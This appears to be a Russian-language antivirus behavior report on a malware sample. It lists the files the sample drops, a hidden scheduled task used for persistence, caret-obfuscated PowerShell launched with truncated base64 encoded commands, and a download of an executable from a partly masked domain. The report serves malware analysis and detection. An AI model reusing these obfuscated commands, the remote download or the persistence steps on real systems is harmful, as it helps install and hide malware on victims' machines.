Техническая информация
- <SYSTEM32>\tasks\updates\gwdeyjldyupgs
- '<SYSTEM32>\cmd.exe' /C PO^W^ERs^HE^LL -e WwBzAHkAcwBUAGUATQAuAFQARQB4AFQALgBlAE4AYwBPAGQAaQBuAEcAXQA6ADoAdQBOAEkAQwBvAEQARQAuAEcAZQBUAHMAVAByAEkATgBHACgAWwBTAFkAUwBUAGUAbQAuAEMATwBOAFYARQByAFQAXQA6ADoAZgBSAG8AbQBC...
- bkmjab.exe
- %TEMP%\bita12e.tmp
- %APPDATA%\gwdeyjldyupgs.exe
- %TEMP%\tmp203.tmp
- %TEMP%\bita12e.tmp
- %APPDATA%\gwdeyjldyupgs.exe
- %TEMP%\tmp203.tmp
- %TEMP%\bita12e.tmp в %TEMP%\bkmjab.exe
- 'ce###donia.co':80
- http://ce###donia.co/O4N1l8TCkWcQlXC.exe
- DNS ASK ce###donia.co
- '%TEMP%\bkmjab.exe'
- '<SYSTEM32>\cmd.exe' /C PO^W^ERs^HE^LL -e WwBzAHkAcwBUAGUATQAuAFQARQB4AFQALgBlAE4AYwBPAGQAaQBuAEcAXQA6ADoAdQBOAEkAQwBvAEQARQAuAEcAZQBUAHMAVAByAEkATgBHACgAWwBTAFkAUwBUAGUAbQAuAEMATwBOAFYARQByAFQAXQA6ADoAZgBSAG8AbQBC...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\GwDEYjLDYUPGS" /XML "%TEMP%\tmp203.tmp"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e WwBzAHkAcwBUAGUATQAuAFQARQB4AFQALgBlAE4AYwBPAGQAaQBuAEcAXQA6ADoAdQBOAEkAQwBvAEQARQAuAEcAZQBUAHMAVAByAEkATgBHACgAWwBTAFkAUwBUAGUAbQAuAEMATwBOAFYARQByAFQAXQA6ADoAZgBSAG8AbQBCAGEAUwBFADYANABzAF...
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\GwDEYjLDYUPGS" /XML "%TEMP%\tmp203.tmp"